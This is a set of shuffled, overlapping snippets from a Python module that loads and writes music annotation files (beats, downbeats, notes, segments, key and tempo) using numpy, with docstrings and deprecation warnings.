'%.3f %.3f'), in which", "header + '\\n').encode(ENCODING))) # write events for e in events: try: string =", "raise AssertionError('tempi and strengths must have same length') # order the tempi according", "f = filename fid = None # yield an open file handle yield", "Notes ----- Comments (lines starting with '#') and additional columns are ignored, i.e.", "if len(tempi) != len(strengths): raise AssertionError('tempi and strengths must have same length') #", "Parameters ---------- filename : str or file handle File (handle) to open. mode:", "close the file if needed if fid: fid.close() @suppress_warnings def load_events(filename): \"\"\" Load", "one floating point number per line. Parameters ---------- filename : str or file", "['beat_number']. Parameters ---------- filename : str or file handle File to load the", "sort_idx = (-strengths).argsort(kind='mergesort') tempi = tempi[sort_idx] strengths = strengths[sort_idx] # return at most", "the first column is returned. \"\"\" # read in the events, one per", "segments : numpy structured array Structured array with columns 'start', 'end', and 'label',", "---------- filename : str or file handle File (handle) to open. mode: {'r',", "# write the notes write_events(notes, filename, fmt=fmt, delimiter=delimiter, header=header) def load_segments(filename): \"\"\" Load", "not None: import warnings warnings.warn('`norm_strengths` is deprecated as of version 0.16 and '", "is not None: import warnings warnings.warn('`mirex` argument is deprecated as of version 0.16", "as comment. Returns ------- numpy array Notes. \"\"\" # set default format if", "returned. \"\"\" # try to load the data from file values = np.loadtxt(filename,", "one if strength_sum == 0: strengths = np.ones_like(tempi) / float(len(tempi)) # normalize the", "0): raise AssertionError('strengths must be positive') # no strength is given, assume an", "that will be written at the beginning of the file as comment. \"\"\"", "\"\"\" Write labelled segments to a file. 
Parameters ---------- segments : numpy structured", "'removed in 0.18. Please sort the returned array ' 'separately.') # Note: use", "== 2: raise ValueError('unknown format for `notes`') # truncate format to the number", "named columns: 'start' contains the start position (e.g. seconds), 'end' the end position,", "the file is opened. Yields ------ Open file (handle). \"\"\" # check if", "from a text file, one floating point number per line. Parameters ---------- filename", "downbeats instead of beats. Returns ------- numpy array Beats. \"\"\" values = np.loadtxt(filename,", "'%.3f', '%s'] write_events(segments, filename, fmt=fmt, delimiter=delimiter, header=header) load_chords = load_segments write_chords = write_segments", "t2 = tempi[:2, 0] strength = tempi[0, 1] / sum(tempi[:2, 1]) # for", "(e.g. '%.3f'), a sequence of formats (e.g. ['%.3f', '%d']), or a multi-format string", "tempi : numpy array Array with the detected tempi (first column) and their", "# Note: use 'mergesort', because we want a stable sorting algorithm # which", "the 2nd column are downbeats return values[values[:, 1] == 1][:, 0] else: #", "import warnings warnings.warn('`max_len` is deprecated as of version 0.16 and will be '", "second most dominant tempo. strength : float Their relative strength. \"\"\" # make", "as strengths. sort : bool, deprecated Sort the tempi by their strength. norm_strengths", "relative strength. \"\"\" # make the given tempi a 2d array tempi =", "s, e, l = line.split() start.append(float(s)) end.append(float(e)) label.append(l) segments = np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start']", "'end' the end position, and 'label' the segment label. \"\"\" if fmt is", "= np.array(events) # reformat fmt to be a single string if needed if", "magic file handling @contextlib.contextmanager def open_file(filename, mode='r'): \"\"\" Context manager which yields an", "notes from. Returns ------- numpy array Notes. 
\"\"\" return np.loadtxt(filename, ndmin=2) def write_notes(notes,", "2: fmt = ['%.3f', '%d'] elif fmt is None: fmt = '%.3f' write_events(beats,", "the tempo from. split_value : float, optional Value to distinguish between tempi and", "for line in f: s, e, l = line.split() start.append(float(s)) end.append(float(e)) label.append(l) segments", "properly strength_sum = np.sum(strengths) # relative strengths are given (one less than tempi)", "some magic file handling @contextlib.contextmanager def open_file(filename, mode='r'): \"\"\" Context manager which yields", "the file as comment. Returns ------- numpy array Notes. \"\"\" # set default", "deprecated as of version 0.16 and ' 'will be removed in 0.18. Please", "the file as comment. mirex : bool, deprecated Report the lower tempo first", "end segments['label'] = label return segments def write_segments(segments, filename, fmt=None, delimiter='\\t', header=None): \"\"\"", "because we want # tempi with uniformly distributed strengths to keep their order", "in f: s, e, l = line.split() start.append(float(s)) end.append(float(e)) label.append(l) segments = np.zeros(len(start),", "beginning of the file as comment. Returns ------- numpy structured array Labelled segments", "is returned. \"\"\" # read in the events, one per line events =", "be written at the beginning of the file as comment. \"\"\" if fmt", "written at the beginning of the file as comment. Returns ------- key :", "in which the file is opened. Yields ------ Open file (handle). \"\"\" #", "filename, header=None): \"\"\" Write key string to a file. Parameters ---------- key :", "Returns ------- numpy structured array Labelled segments Notes ----- Labelled segments are represented", "fid = None # yield an open file handle yield f # close", "at the beginning of the file as comment. 
Notes ----- If `beats` contains", "the built-in open() to transparently apply some magic file handling @contextlib.contextmanager def open_file(filename,", "is not None: import warnings warnings.warn('`max_len` is deprecated as of version 0.16 and", "or file handle File to load the notes from. Returns ------- numpy array", "label of segments. \"\"\" start, end, label = [], [], [] with open_file(filename)", "and strengths must have same length if len(tempi) != len(strengths): raise AssertionError('tempi and", "contains both time and number of the beats, they are filtered to contain", "format to the number of colums given fmt = delimiter.join(fmt[:notes.shape[1]]) # write the", "strongest tempi and strengths elif len(tempi) > 1: t1, t2 = tempi[:2, 0]", "' 'separately.') return np.vstack((tempi[:max_len], strengths[:max_len])).T def write_tempo(tempi, filename, delimiter='\\t', header=None, mirex=None): \"\"\" Write", "and their strengths (second column). filename : str or file handle Output file.", "end, label = [], [], [] with open_file(filename) as f: for line in", "the notes to a file. Parameters ---------- notes : numpy array, shape (num_notes,", "is returned. \"\"\" # try to load the data from file values =", "Parameters ---------- filename : str or file handle File to load the downbeats", "(lines starting with '#') and additional columns are ignored, i.e. only the first", "delimiter.join(fmt[:notes.shape[1]]) # write the notes write_events(notes, filename, fmt=fmt, delimiter=delimiter, header=header) def load_segments(filename): \"\"\"", "is None and beats.ndim == 2: fmt = ['%.3f', '%d'] elif fmt is", "delimiter=delimiter, header=header) def load_segments(filename): \"\"\" Load labelled segments from file, one segment per", "will be written at the beginning of the file as comment. mirex :", "load_beats(filename, downbeats=False): \"\"\" Load the beats from the given file, one beat per", "t2, t1, 1. 
- strength # format as a numpy array and write", "beginning of the file as comment. \"\"\" if fmt is None and beats.ndim", "the number of colums given fmt = delimiter.join(fmt[:notes.shape[1]]) # write the notes write_events(notes,", "segments # 'label' needs to be castable to str SEGMENT_DTYPE = [('start', np.float),", "(num_tempi[, 2]) Array with tempi. If no strength is parsed, a 1-dimensional array", "colums given fmt = delimiter.join(fmt[:notes.shape[1]]) # write the notes write_events(notes, filename, fmt=fmt, delimiter=delimiter,", "str or file handle File to read key information from. Returns ------- str", "e.g. '%.3f %d %.3f %d', in which case `delimiter` is ignored. delimiter :", "file, one event per line. Parameters ---------- events : numpy array Events to", "trick because we want # tempi with uniformly distributed strengths to keep their", "argument is deprecated as of version 0.16 ' 'and will be removed in", "strs, optional A sequence of formats (e.g. ['%.3f', '%.3f', '%s']), or a multi-format", "[('start', np.float), ('end', np.float), ('label', object)] # overwrite the built-in open() to transparently", "# rows with a \"1\" in the 2nd column are downbeats return values[values[:,", "= [], [], [] with open_file(filename) as f: for line in f: s,", "must have the following format: 'main tempo' ['secondary tempo' ['relative_strength']] Parameters ---------- filename", "= t2 = strength = np.nan # only one tempo was detected if", "sequence of strs, optional A sequence of formats (e.g. ['%.3f', '%.3f', '%s']), or", "t2: t1, t2, strength = t2, t1, 1. - strength # format as", "load_downbeats(filename): \"\"\" Load the downbeats from the given file. Parameters ---------- filename :", "their strength. norm_strengths : bool, deprecated Normalize the strengths to sum 1. max_len", "except AttributeError: string = e except TypeError: string = fmt % e f.write(bytes((string", "to a file. 
Parameters ---------- segments : numpy structured array Labelled segments, one", "t2, strength = t2, t1, 1. - strength # format as a numpy", "the notes from the given file, one note per line of format 'onset_time'", "np.ones_like(tempi) / float(len(tempi)) # normalize the strengths if norm_strengths is not None: import", "if fmt is None and beats.ndim == 2: fmt = ['%.3f', '%d'] elif", "write_tempo(tempi, filename, delimiter='\\t', header=None, mirex=None): \"\"\" Write the most dominant tempi and the", "the filename according to their filename into tempi and strengths # TODO: this", "deprecated Normalize the strengths to sum 1. max_len : int, deprecated Return at", "strs, optional A single format (e.g. '%.3f'), a sequence of formats (e.g. ['%.3f',", "str, optional String or character separating columns. header : str, optional String that", "None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header) @suppress_warnings def load_notes(filename): \"\"\"", "strengths = strengths[sort_idx] # return at most 'max_len' tempi and their relative strength", "beats : numpy array Beats or downbeats to be written to file. filename", "be positive') # no strength is given, assume an evenly distributed one if", "------- str Key. \"\"\" with open_file(filename) as f: return f.read().strip() def write_key(key, filename,", "yields an open file or handle with the given mode and closes it", "it if needed afterwards. Parameters ---------- filename : str or file handle File", "The most dominant tempo. tempo_2 : float The second most dominant tempo. strength", "write the events to. fmt : str or sequence of strs, optional A", "string_types ENCODING = 'utf8' # dtype for numpy structured arrays that contain labelled", "------- tempo_1 : float The most dominant tempo. tempo_2 : float The second", "to be castable to str SEGMENT_DTYPE = [('start', np.float), ('end', np.float), ('label', object)]", "max_len : int, deprecated Return at most `max_len` tempi. 
Returns ------- tempi :", "and will be ' 'removed in 0.18. Please sort the returned array '", "<= split_value] # make the strengths behave properly strength_sum = np.sum(strengths) # relative", "version 0.16 and will be ' 'removed in 0.18. Please sort the returned", "or file handle Output file. header : str, optional String that will be", "fmt = ['%.3f', '%d', '%.3f', '%d'] if not notes.ndim == 2: raise ValueError('unknown", "numbers, and <label> is a string. Parameters ---------- filename : str or file", "MIREX, the lower tempo must be given first if mirex is not None:", "is None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header) def load_downbeats(filename): \"\"\"", "strengths to sum 1. max_len : int, deprecated Return at most `max_len` tempi.", "optional A sequence of formats (e.g. ['%.3f', '%d', '%.3f', '%d']), or a multi-format", "File to load the events from. Returns ------- numpy array Events. Notes -----", "optional A single format (e.g. '%.3f'), a sequence of formats (e.g. ['%.3f', '%d']),", "a string. Parameters ---------- filename : str or file handle File to read", "array Array with the detected tempi (first column) and their strengths (second column).", "comment. Returns ------- numpy structured array Labelled segments Notes ----- Labelled segments are", "as a numpy array and write to output out = np.array([t1, t2, strength],", "'end', and 'label', containing the beginning, end, and label of segments. \"\"\" start,", "'%s']), or a multi-format string (e.g. '%.3f %.3f %s'), in which case `delimiter`", "import numpy as np from .audio import load_audio_file from .midi import load_midi, write_midi", "' 'tempi manually') if t1 > t2: t1, t2, strength = t2, t1,", "0] else: # 1st column is the beat time, the rest is ignored", "positive') # no strength is given, assume an evenly distributed one if strength_sum", ": str or file handle File to load the tempo from. split_value :", "strength. 
\"\"\" # make the given tempi a 2d array tempi = np.array(tempi,", "the file as comment. \"\"\" if fmt is None and beats.ndim == 2:", "optional String or character separating columns. header : str, optional String that will", "array Labelled segments, one per row (column definition see SEGMENT_DTYPE). filename : str", "int, deprecated Return at most `max_len` tempi. Returns ------- tempi : numpy array,", "open file handle yield f # close the file if needed if fid:", "be written at the beginning of the file as comment. Notes ----- If", "of the file as comment. mirex : bool, deprecated Report the lower tempo", "optional Load only downbeats instead of beats. Returns ------- numpy array Beats. \"\"\"", "of the file as comment. \"\"\" events = np.array(events) # reformat fmt to", "at the beginning of the file as comment. Returns ------- key : str", "from. downbeats : bool, optional Load only downbeats instead of beats. Returns -------", "beats. Returns ------- numpy array Beats. \"\"\" values = np.loadtxt(filename, ndmin=1) if values.ndim", "needed if isinstance(fmt, (list, tuple)): fmt = delimiter.join(fmt) # write output with open_file(filename,", "relative strength if max_len is not None: import warnings warnings.warn('`max_len` is deprecated as", "file, one note per line of format 'onset_time' 'note_number' ['duration' ['velocity']]. Parameters ----------", "e, l = line.split() start.append(float(s)) end.append(float(e)) label.append(l) segments = np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start'] =", "events, one per line events = np.loadtxt(filename, ndmin=2) # 1st column is the", "\"\"\" return load_beats(filename, downbeats=True) def write_downbeats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the", "to a file. Parameters ---------- notes : numpy array, shape (num_notes, 2) Notes,", "tempi = values[values > split_value] strengths = values[values <= split_value] # make the", "per line of format 'beat_time' ['beat_number']. 
Parameters ---------- filename : str or file", "formats (e.g. ['%.3f', '%.3f', '%s']), or a multi-format string (e.g. '%.3f %.3f %s'),", "np.vstack((tempi[:max_len], strengths[:max_len])).T def write_tempo(tempi, filename, delimiter='\\t', header=None, mirex=None): \"\"\" Write the most dominant", "if isinstance(filename, string_types): f = fid = _io.open(filename, mode) else: f = filename", "as comment. \"\"\" events = np.array(events) # reformat fmt to be a single", "<start> <end> <label>, where <start> and <end> are floating point numbers, and <label>", "= np.nan # only one tempo was detected if len(tempi) == 1: t1", "string = fmt % tuple(e.tolist()) except AttributeError: string = e except TypeError: string", "a text file, one floating point number per line. Parameters ---------- filename :", "to sum 1. max_len : int, deprecated Return at most `max_len` tempi. Returns", "+ header + '\\n').encode(ENCODING))) # write events for e in events: try: string", "keys in case of duplicate keys # but we need to apply this", "with '#') and additional columns are ignored, i.e. only the first column is", "'note_number' ['duration' ['velocity']]. filename : str or file handle File to write the", "with open_file(filename) as f: return f.read().strip() def write_key(key, filename, header=None): \"\"\" Write key", "filename, delimiter='\\t', header=None, mirex=None): \"\"\" Write the most dominant tempi and the relative", "file handle File to read the labelled segments from. Returns ------- segments :", "/= float(strength_sum) # tempi and strengths must have same length if len(tempi) !=", "str or file handle Output file. header : str, optional String that will", "version 0.16 and ' 'will be removed in 0.18. Please normalize strengths '", "array with tempi (first column) and their relative strengths (second column) is returned.", "Comments (lines starting with '#') and additional columns are ignored, i.e. only the", "the file as comment. 
Returns ------- numpy structured array Labelled segments Notes -----", "downbeats=False): \"\"\" Load the beats from the given file, one beat per line", "of the file as comment. \"\"\" if fmt is None and beats.ndim ==", "this '(-strengths)' trick because we want # tempi with uniformly distributed strengths to", "0] def write_events(events, filename, fmt='%.3f', delimiter='\\t', header=None): \"\"\" Write the events to a", "header=None): \"\"\" Write labelled segments to a file. Parameters ---------- segments : numpy", "fmt=fmt, delimiter=delimiter, header=header) def load_segments(filename): \"\"\" Load labelled segments from file, one segment", "`values` > `split_value` are interpreted as tempi [bpm], `values` <= `split_value` are interpreted", "both time and number of the beats, they are filtered to contain only", "The second most dominant tempo. strength : float Their relative strength. \"\"\" #", "a file. Parameters ---------- tempi : numpy array Array with the detected tempi", "line. Each segment is of form <start> <end> <label>, where <start> and <end>", "by MIREX). Returns ------- tempo_1 : float The most dominant tempo. tempo_2 :", "where <start> and <end> are floating point numbers, and <label> is a string.", "most dominant tempo. tempo_2 : float The second most dominant tempo. strength :", "strengths behave properly strength_sum = np.sum(strengths) # relative strengths are given (one less", "write_downbeats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the downbeats to a file. Parameters", "Parameters ---------- key : str Key name. filename : str or file handle", "load_beats(filename, downbeats=True) def write_downbeats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the downbeats to", "we need to apply this '(-strengths)' trick because we want # tempi with", "optional A single format (e.g. 
'%.3f'), a sequence of formats, or a multi-format", "delimiter, header) def load_downbeats(filename): \"\"\" Load the downbeats from the given file. Parameters", "len(tempi) != len(strengths): raise AssertionError('tempi and strengths must have same length') # order", "deprecated Report the lower tempo first (as required by MIREX). Returns ------- tempo_1", "keeps the order of the keys in case of duplicate keys # but", "filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the downbeats to a file. Parameters ----------", "a multi-format string (e.g. '%.3f %d'), in which case `delimiter` is ignored. delimiter", "['%.3f', '%.3f', '%s'] write_events(segments, filename, fmt=fmt, delimiter=delimiter, header=header) load_chords = load_segments write_chords =", "open_file(filename) as f: return f.read().strip() def write_key(key, filename, header=None): \"\"\" Write key string", "package. \"\"\" from __future__ import absolute_import, division, print_function import io as _io import", "values.ndim > 1: if downbeats: # rows with a \"1\" in the 2nd", "multi-format string, e.g. '%.3f %d %.3f %d', in which case `delimiter` is ignored.", "column is returned. \"\"\" # read in the events, one per line events", "strength if max_len is not None: import warnings warnings.warn('`max_len` is deprecated as of", "str or file handle Output file. delimiter : str, optional String or character", "Returns ------- key : str Key name. \"\"\" write_events([key], filename, fmt='%s', header=header) def", "yield f # close the file if needed if fid: fid.close() @suppress_warnings def", "string = e except TypeError: string = fmt % e f.write(bytes((string + '\\n').encode(ENCODING)))", "the lower tempo must be given first if mirex is not None: import", "will be removed in version 0.17. Please sort the ' 'tempi manually') if", "notes to. 
fmt : str or sequence of strs, optional A sequence of", "\"1\" in the 2nd column are downbeats return values[values[:, 1] == 1][:, 0]", "downbeats to be written to file. filename : str or file handle File", "# make the strengths behave properly strength_sum = np.sum(strengths) # relative strengths are", "make the given tempi a 2d array tempi = np.array(tempi, ndmin=2) # default", "write_key(key, filename, header=None): \"\"\" Write key string to a file. Parameters ---------- key", "filename : str or file handle File to load the beats from. downbeats", "label.append(l) segments = np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start'] = start segments['end'] = end segments['label'] =", "# overwrite the built-in open() to transparently apply some magic file handling @contextlib.contextmanager", "if mirex is not None: import warnings warnings.warn('`mirex` argument is deprecated as of", "if header is not None: f.write(bytes(('# ' + header + '\\n').encode(ENCODING))) # write", "segment per line. Each segment is of form <start> <end> <label>, where <start>", "2) Notes, row format 'onset_time' 'note_number' ['duration' ['velocity']]. filename : str or file", "File to load the downbeats from. Returns ------- numpy array Downbeats. \"\"\" return", "line.split() start.append(float(s)) end.append(float(e)) label.append(l) segments = np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start'] = start segments['end'] =", "and 'label', containing the beginning, end, and label of segments. \"\"\" start, end,", "------- numpy structured array Labelled segments Notes ----- Labelled segments are represented as", "Downbeats. \"\"\" return load_beats(filename, downbeats=True) def write_downbeats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write", "__future__ import absolute_import, division, print_function import io as _io import contextlib import numpy", "load the notes from. Returns ------- numpy array Notes. 
\"\"\" return np.loadtxt(filename, ndmin=2)", "rest is ignored return values[:, 0] return values def write_beats(beats, filename, fmt=None, delimiter='\\t',", "at the beginning of the file as comment. \"\"\" events = np.array(events) #", "a stable sorting algorithm # which keeps the order of the keys in", "for numpy structured arrays that contain labelled segments # 'label' needs to be", ": str or file handle File to write the events to. fmt :", "file handle File to load the events from. Returns ------- numpy array Events.", "downbeats from. Returns ------- numpy array Downbeats. \"\"\" return load_beats(filename, downbeats=True) def write_downbeats(beats,", "the rest is ignored return values[:, 0] return values def write_beats(beats, filename, fmt=None,", "we need to open the file if isinstance(filename, string_types): f = fid =", "as comment. Notes ----- If `beats` contains both time and number of the", "is ignored return events[:, 0] def write_events(events, filename, fmt='%.3f', delimiter='\\t', header=None): \"\"\" Write", "the given file, one beat per line of format 'beat_time' ['beat_number']. Parameters ----------", "to a file. Parameters ---------- beats : numpy array Beats or downbeats to", "SEGMENT_DTYPE = [('start', np.float), ('end', np.float), ('label', object)] # overwrite the built-in open()", "file. Parameters ---------- filename : str or file handle File to load the", "no strength is given, assume an evenly distributed one if strength_sum == 0:", "will be written at the beginning of the file as comment. Returns -------", "= '%.3f' write_events(beats, filename, fmt, delimiter, header) def load_downbeats(filename): \"\"\" Load the downbeats", "filename : str or file handle File to load the tempo from. split_value", "from. Returns ------- numpy array Events. 
Notes ----- Comments (lines starting with '#')", "fid: fid.close() @suppress_warnings def load_events(filename): \"\"\" Load a events from a text file,", "load_chords = load_segments write_chords = write_segments def load_key(filename): \"\"\" Load the key from", "filename : str or file handle File to read key information from. Returns", "fmt is None: fmt = ['%.3f', '%.3f', '%s'] write_events(segments, filename, fmt=fmt, delimiter=delimiter, header=header)", "`beats` contains both time and number of the beats, they are filtered to", "file. Parameters ---------- filename : str or file handle File to read key", "and number of the beats, they are filtered to contain only the downbeats", "the strengths to sum 1. max_len : int, deprecated Return at most `max_len`", "check if we need to open the file if isinstance(filename, string_types): f =", "= write_events @suppress_warnings def load_beats(filename, downbeats=False): \"\"\" Load the beats from the given", "file. Parameters ---------- key : str Key name. filename : str or file", "strength = tempi[0, 1] / sum(tempi[:2, 1]) # for MIREX, the lower tempo", "contain only the downbeats (i.e. only the times of those beats with a", "file if needed if fid: fid.close() @suppress_warnings def load_events(filename): \"\"\" Load a events", "with columns 'start', 'end', and 'label', containing the beginning, end, and label of", "start, end, label = [], [], [] with open_file(filename) as f: for line", "handle File to load the beats from. downbeats : bool, optional Load only", "or sequence of strs, optional A sequence of formats (e.g. 
['%.3f', '%.3f', '%s']),", "('label', object)] # overwrite the built-in open() to transparently apply some magic file", "= load_events write_onsets = write_events @suppress_warnings def load_beats(filename, downbeats=False): \"\"\" Load the beats", "load_segments write_chords = write_segments def load_key(filename): \"\"\" Load the key from the given", "norm_strengths is not None: import warnings warnings.warn('`norm_strengths` is deprecated as of version 0.16", "return values def write_beats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the beats to", "to load the tempo from. split_value : float, optional Value to distinguish between", "segment label. \"\"\" if fmt is None: fmt = ['%.3f', '%.3f', '%s'] write_events(segments,", "Returns ------- numpy array Downbeats. \"\"\" return load_beats(filename, downbeats=True) def write_downbeats(beats, filename, fmt=None,", "numpy array, shape (num_notes, 2) Notes, row format 'onset_time' 'note_number' ['duration' ['velocity']]. filename", "tempi a 2d array tempi = np.array(tempi, ndmin=2) # default values t1 =", "is returned. If strengths are given, a 2D array with tempi (first column)", "\"\"\" Load the notes from the given file, one note per line of", "labelled segments from file, one segment per line. Each segment is of form", "format for `notes`') # truncate format to the number of colums given fmt", ": numpy structured array Labelled segments, one per row (column definition see SEGMENT_DTYPE).", "the start position (e.g. seconds), 'end' the end position, and 'label' the segment", "afterwards. Parameters ---------- filename : str or file handle File (handle) to open.", "as of version 0.16 ' 'and will be removed in version 0.17. Please", "file as comment. Returns ------- key : str Key name. 
\"\"\" write_events([key], filename,", "# only one tempo was detected if len(tempi) == 1: t1 = tempi[0][0]", "None # yield an open file handle yield f # close the file", ": float The second most dominant tempo. strength : float Their relative strength.", "ignored return values[:, 0] return values def write_beats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\"", "handle Output filename or handle. fmt : str or sequence of strs, optional", "in case of duplicate keys # but we need to apply this '(-strengths)'", "np.float), ('label', object)] # overwrite the built-in open() to transparently apply some magic", "the events, one per line events = np.loadtxt(filename, ndmin=2) # 1st column is", "segments['start'] = start segments['end'] = end segments['label'] = label return segments def write_segments(segments,", "if we need to open the file if isinstance(filename, string_types): f = fid", "values = np.loadtxt(filename, ndmin=1) # split the filename according to their filename into", "warnings warnings.warn('`mirex` argument is deprecated as of version 0.16 ' 'and will be", "labelled segments to a file. Parameters ---------- segments : numpy structured array Labelled", "ENCODING = 'utf8' # dtype for numpy structured arrays that contain labelled segments", "strs, optional A sequence of formats (e.g. ['%.3f', '%d', '%.3f', '%d']), or a", "['%.3f', '%.3f', '%s']), or a multi-format string (e.g. '%.3f %.3f %s'), in which", "start segments['end'] = end segments['label'] = label return segments def write_segments(segments, filename, fmt=None,", "\"\"\" # read in the events, one per line events = np.loadtxt(filename, ndmin=2)", "filename, fmt, delimiter, header) def load_downbeats(filename): \"\"\" Load the downbeats from the given", "(e.g. seconds), 'end' the end position, and 'label' the segment label. \"\"\" if", "array Notes. \"\"\" # set default format if fmt is None: fmt =", "0.17. 
Please sort the ' 'tempi manually') if t1 > t2: t1, t2,", "a multi-format string (e.g. '%.3f %.3f'), in which case `delimiter` is ignored. delimiter", "\"\"\" with open_file(filename) as f: return f.read().strip() def write_key(key, filename, header=None): \"\"\" Write", "isinstance(fmt, (list, tuple)): fmt = delimiter.join(fmt) # write output with open_file(filename, 'wb') as", "event per line. Parameters ---------- events : numpy array Events to be written", "of segments. \"\"\" start, end, label = [], [], [] with open_file(filename) as", "information must have the following format: 'main tempo' ['secondary tempo' ['relative_strength']] Parameters ----------", "%.3f %d', in which case `delimiter` is ignored. delimiter : str, optional String", "per row (column definition see SEGMENT_DTYPE). filename : str or file handle Output", "'start', 'end', and 'label', containing the beginning, end, and label of segments. \"\"\"", "header=None): \"\"\" Write the beats to a file. Parameters ---------- beats : numpy", "fmt = delimiter.join(fmt[:notes.shape[1]]) # write the notes write_events(notes, filename, fmt=fmt, delimiter=delimiter, header=header) def", "is ignored. delimiter : str, optional String or character separating columns. header :", "`split_value` are interpreted as strengths. sort : bool, deprecated Sort the tempi by", "an open file handle yield f # close the file if needed if", "float The second most dominant tempo. strength : float Their relative strength. \"\"\"", "fmt to be a single string if needed if isinstance(fmt, (list, tuple)): fmt", "returned array ' 'separately.') return np.vstack((tempi[:max_len], strengths[:max_len])).T def write_tempo(tempi, filename, delimiter='\\t', header=None, mirex=None):", "open_file(filename, mode='r'): \"\"\" Context manager which yields an open file or handle with", "mirex=None): \"\"\" Write the most dominant tempi and the relative strength to a", "deprecated Sort the tempi by their strength. 
norm_strengths : bool, deprecated Normalize the", "formats (e.g. ['%.3f', '%d', '%.3f', '%d']), or a multi-format string, e.g. '%.3f %d", "tempo information from the given file. Tempo information must have the following format:", "# write output with open_file(filename, 'wb') as f: # write header if header", "written at the beginning of the file as comment. Returns ------- numpy array", "from file values = np.loadtxt(filename, ndmin=1) # split the filename according to their", "tempi [bpm], `values` <= `split_value` are interpreted as strengths. sort : bool, deprecated", "(e.g. ['%.3f', '%d', '%.3f', '%d']), or a multi-format string, e.g. '%.3f %d %.3f", "or character separating columns. header : str, optional String that will be written", "two strongest tempi and strengths elif len(tempi) > 1: t1, t2 = tempi[:2,", "written at the beginning of the file as comment. \"\"\" events = np.array(events)", "(e.g. '%.3f'), a sequence of formats, or a multi-format string (e.g. '%.3f %.3f'),", "time, the rest is ignored return values[:, 0] return values def write_beats(beats, filename,", "'main tempo' ['secondary tempo' ['relative_strength']] Parameters ---------- filename : str or file handle", "e except TypeError: string = fmt % e f.write(bytes((string + '\\n').encode(ENCODING))) f.flush() load_onsets", "Parameters ---------- filename : str or file handle File to load the tempo", "0] return values def write_beats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the beats", "to the number of colums given fmt = delimiter.join(fmt[:notes.shape[1]]) # write the notes", "<end> <label>, where <start> and <end> are floating point numbers, and <label> is", "the events from. Returns ------- numpy array Events. Notes ----- Comments (lines starting", "array Beats. \"\"\" values = np.loadtxt(filename, ndmin=1) if values.ndim > 1: if downbeats:", "detected tempi (first column) and their strengths (second column). 
filename : str or", "strengths # TODO: this is kind of hack-ish, find a better solution tempi", "(one less than tempi) if len(tempi) - len(strengths) == 1: strengths = np.append(strengths,", "a file, one event per line. Parameters ---------- events : numpy array Events", "array Structured array with columns 'start', 'end', and 'label', containing the beginning, end,", "write_chords = write_segments def load_key(filename): \"\"\" Load the key from the given file.", "strengths = np.ones_like(tempi) / float(len(tempi)) # normalize the strengths if norm_strengths is not", "String that will be written at the beginning of the file as comment.", "'\\n').encode(ENCODING))) # write events for e in events: try: string = fmt %", "values[values[:, 1] == 1][:, 0] else: # 1st column is the beat time,", "numpy array Notes. \"\"\" # set default format if fmt is None: fmt", "the notes from. Returns ------- numpy array Notes. \"\"\" return np.loadtxt(filename, ndmin=2) def", "open the file if isinstance(filename, string_types): f = fid = _io.open(filename, mode) else:", "'note_number' ['duration' ['velocity']]. Parameters ---------- filename: str or file handle File to load", "filename, fmt='%s', header=header) def load_tempo(filename, split_value=1., sort=None, norm_strengths=None, max_len=None): \"\"\" Load tempo information", "1: t1 = tempi[0][0] strength = 1. # consider only the two strongest", "version 0.17. Please sort the ' 'tempi manually') if t1 > t2: t1,", "norm_strengths=None, max_len=None): \"\"\" Load tempo information from the given file. Tempo information must", "given file. Parameters ---------- filename : str or file handle File to load", "tempo from. 
split_value : float, optional Value to distinguish between tempi and strengths.", "the returned array ' 'separately.') # Note: use 'mergesort', because we want a", "numpy as np from .audio import load_audio_file from .midi import load_midi, write_midi from", "an evenly distributed one if strength_sum == 0: strengths = np.ones_like(tempi) / float(len(tempi))", "np.loadtxt(filename, ndmin=2) def write_notes(notes, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the notes to", "return events[:, 0] def write_events(events, filename, fmt='%.3f', delimiter='\\t', header=None): \"\"\" Write the events", "of format 'onset_time' 'note_number' ['duration' ['velocity']]. Parameters ---------- filename: str or file handle", "a 2d array tempi = np.array(tempi, ndmin=2) # default values t1 = t2", "are interpreted as tempi [bpm], `values` <= `split_value` are interpreted as strengths. sort", "---------- filename : str or file handle File to load the downbeats from.", "segments['label'] = label return segments def write_segments(segments, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write", "tempo' ['secondary tempo' ['relative_strength']] Parameters ---------- filename : str or file handle File", "is None: fmt = ['%.3f', '%d', '%.3f', '%d'] if not notes.ndim == 2:", "as _io import contextlib import numpy as np from .audio import load_audio_file from", "if downbeats: # rows with a \"1\" in the 2nd column are downbeats", "Parameters ---------- beats : numpy array Beats or downbeats to be written to", "Beats. \"\"\" values = np.loadtxt(filename, ndmin=1) if values.ndim > 1: if downbeats: #", "relative strengths (second column) is returned. \"\"\" # try to load the data", "Sort the tempi by their strength. norm_strengths : bool, deprecated Normalize the strengths", "Normalize the strengths to sum 1. max_len : int, deprecated Return at most", "at the beginning of the file as comment. mirex : bool, deprecated Report", "beat number of 1). 
